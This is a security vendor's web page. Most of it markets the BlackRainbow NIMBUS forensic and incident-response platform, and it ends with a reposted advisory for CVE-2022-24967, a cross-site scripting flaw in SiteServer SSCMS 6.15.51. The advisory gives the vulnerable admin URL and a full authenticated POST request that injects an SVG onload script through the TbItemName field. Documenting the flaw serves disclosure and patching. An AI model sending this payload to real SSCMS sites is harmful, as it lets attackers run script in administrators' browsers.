**Orchestration & Automation**

**Orchestration & Automation Platform**

Visually digitise standard operating procedures, lab workflows or any playbook with ease allowing integration with forensic technologies, digital or traditional or external data sources. Orchestrate multiple automations, queue, prioritise, status controlled, workflow within workflow fully audited and reportable.

**Orchestration & Automation**

**Packed with features including:**

**NIMBUS Cloud & SaaS**

**Instant and flexible deployment**

Leverage the power, resilience, and speed of deployment of NIMBUS in the cloud environment of your choice as a true SaaS offering. Managed by an industry leading service delivery model, BlackRainbow removes the risk and complication of an on premise installation whilst delivering full functionality in an accelerated way.

**NIMBUS Cloud & SaaS**

**Packed with features including:**

**NIMBUS Incident Response Lifecycle Management Platform**

**Total Security Operations Management**

BlackRainbow’s incident response lifecycle management platform accelerates the incident response lifecycle, it is the connecting fabric for security infrastructure and teams. It offers entire incident management, intelligent automation and orchestration and interactive investigation. The platform has a focus on customisability and collaboration. This solution is available as a SaaS cloud-based solution, or it can be deployed on premise.

**NIMBUS Incident Response Lifecycle Management Platform**

**Packed with features including:**

**Would you like to see NIMBUS in action ?**

**PHANEROS Portal**

**Forensic requests submitted from anywhere on any platform**

PHANEROS the NIMBUS submission portal is an advanced configurable two-way electronic mobile submission management and production system for compiling, publishing, importing, and reviewing forensic case submissions. Remote users can add a case, build submissions to NIMBUS Core for authorisation, enter evidence, notes, and scene information with an on or offline capability with no need for a heavy local application install.

**PHANEROS Portal**

**Packed with features including:**

**NIMBUS Intelligence Management**

**Intelligence when you need it**

NIMBUS intelligence management and orchestration allows the ability to instigate, integrate or ‘reach out’ to the relevant intelligence resource needed for that stage of the investigation. It may be that OSINT, Dark web, local digital media seizure, external threat feeds, case metadata or external database information is needed to assist with the next stage of the investigation, NIMBUS manages the flow, automates workflow and notifications on watchlists and aggregates all of the intelligence in an authorised and auditable way.

**NIMBUS Investigation Management**

**Packed with features including:**

**Quality Management System**

**Integrated Quality Management System**

QMS aligns all the necessary areas to drive accreditation to any ISO standard or equivalent international standard. Manage and control your business performance, data and risks using our integrated quality management modules, non-conformance, actions, assets and more. When combined with NIMBUS CM it accelerates and governs the ability to obtain and maintain ISO accreditation, whilst removing administrative burdens associated to siloed systems.

**Quality Management System**

**Packed with features including:**

**Resource Library**

**Watch, read, and listen up**

All the latest videos, papers, articles, datasheets and updates from BlackRainbow

**BlackRainbow**

**Follow us**

Page load link

This website uses cookies for security and usage monitoring. You can accept or reject cookies or see the details and control which cookies are set using the buttons.

**Privacy Overview**

This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyse and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.

Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.

Cookie

Duration

Description

cookielawinfo-checbox-analytics

1 year

This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".

cookielawinfo-checkbox-necessary

1 year

This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".

viewed\_cookie\_policy

1 year

The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.

Cookie

Duration

Description

\_ga

2 years

This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.

\_gat\_gtag\_UA\_109233946\_1

1 minute

This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.

\_gid

1 day

This cookie is installed by Google Analytics. The cookie is used to store information of how visitors use a website and helps in creating an analytics report of how the website is doing. The data collected including the number visitors, the source where they have come from, and the pages visted in an anonymous form.

Powered by

CVE-2022-24967: Corporate – BlackRainbow

siteserver SSCMS 6.15.51 is vulnerable to Cross Site Scripting (XSS).

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver\_install.zip  
SiteServer: V6.15.51  
测试环境：windows 2012 R2  
数据库 sql server 2016  
  
(需要登录测试)  
漏洞url:/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  

包体  
\`POST /SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1 HTTP/1.1  
Host: 192.168.39.3:8055  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 304  
Origin: http://192.168.39.3:8055  
Connection: close  
Referer: http://192.168.39.3:8055/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss\_administrator\_access\_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET\_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS3vGUQNyPwFtxt7YFaPv4h0slash09w0slash0UOjfXLezfaa1ML5HzkaV5p1JCQWmJTQEnr7CYs7SWD7Jqq2Ifc0slash0oUvADaZFl2TmYxcUUCqEQ0equals00secret0  
Upgrade-Insecure-Requests: 1

\_\_EVENTTARGET=&\_\_EVENTARGUMENT=&\_\_VIEWSTATE=MVZqB4shzUeYHIX5zAuRZJJbL8r72A7Evx94mUbTTNpGbOwWBZkeb79FVsI2zTj0PlNYIzK%2BpEzx3SRf96HflbXA8nFVIpCU16GBIeWZSq4vLCZLjX0CoHWGwnxNyQzo&\_\_VIEWSTATEGENERATOR=4DCED64B&TbItemName=%3Csvg+onload%3Dalert%28document.domain%29%3E&TbItemValue=2222&ctl04=%E7%A1%AE+%E5%AE%9A\`

Tag

#intel